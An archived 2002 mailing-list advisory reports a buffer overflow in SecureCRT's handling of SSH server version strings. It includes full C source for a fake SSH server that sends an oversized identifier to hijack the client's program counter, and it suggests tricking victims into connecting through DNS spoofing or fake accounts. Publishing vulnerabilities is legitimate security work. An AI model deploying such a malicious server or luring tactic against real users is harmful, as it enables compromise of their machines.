Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta

• Previous message: stealth: "Re: SSH Protocol Trick"
• Next in thread: kelli burkinshaw: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Maybe reply: kelli burkinshaw: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: Andrea Lisci: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: kelli burkinshaw: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: VanDyke Technical Support: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: VanDyke Technical Support: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

SecureCRT (http://www.vandyke.com/products/securecrt/) seems to have a bug in a
seemlingly trivial portion of its SSH connection code.  When an SSH Client
connects to a server, the server sends a version string containing minor and
major numbers for the protocol, as well as a server-specific identifier string
which is specified to be no more than 40 bytes long.  Unfortunetly the SecureCRT
code which handles errors relating to an unsupported protocol version contains
an unchecked buffer overflow when dealing with this identifier string.

The following C code is given to reproduce this bug (yes I know Perl would have
been shorter, sorry):

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define PORT 9988

int main(int argc, char **argv) {
    int s, n, i, sz = sizeof(struct sockaddr_in);
    struct sockaddr_in local, whatever;
    char payload[510];

    strcpy(payload, "SSH-1.1-");
    for (i = 8; i < 508; i++)
	payload[i] = 'A';
    payload[508] = '\n';
    payload[509] = '\0';

    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
	perror("socket");
	return 1;
    }
    local.sin_family = AF_INET;
    local.sin_port = htons(PORT);
    local.sin_addr.s_addr = INADDR_ANY;
    memset(&(local.sin_zero), 0, 8);
    if (bind(s, (struct sockaddr *)&local, sizeof(struct sockaddr)) == -1) {
	perror("bind");
	return 1;
    }
    if (listen(s, 2) == -1)  {
	perror("listen");
	return 1;
    }
    printf("waiting for connection...\n");
    if ((n = accept(s, (struct sockaddr *)&whatever, &sz)) == -1) {
	perror("accept");
	return 1;
    }
    printf("client connected\n");
    if (send(n, payload, sizeof(payload) - 1, 0) == -1) {
	perror("send");
	return 1;
    }
    printf("sent string: [%s]\n", payload);
    close(n);
    close(s);
    return 0;
}

After starting the (fake) server, run the SecureCRT client, attach a debugger
and connect.  Notice the value of PC is now 0x41414141...coincidence?

There are a number of ways to trick people into connecting to your ssh server,
i.e. telling them you've given them an account on your shell, dns spoofing etc.

    Big shout-out to Lagow, Biggie Smalls (up in heaven),
    Gweeds, & the whole Mr. Mittens crew

	- Kyuzo

• Next message: 2c79cbe14ac7d0b8472d3f129fa1df: "MailMax security advisory/exploit/patch"
• Previous message: stealth: "Re: SSH Protocol Trick"
• Next in thread: kelli burkinshaw: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Maybe reply: kelli burkinshaw: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: Andrea Lisci: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: kelli burkinshaw: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: VanDyke Technical Support: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Reply: VanDyke Technical Support: "Re: Arbitrary Code Execution Vulnerability in VanDyke SecureCRT 3.4 & 4.0 beta"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 23 2002 - 14:56:45 PDT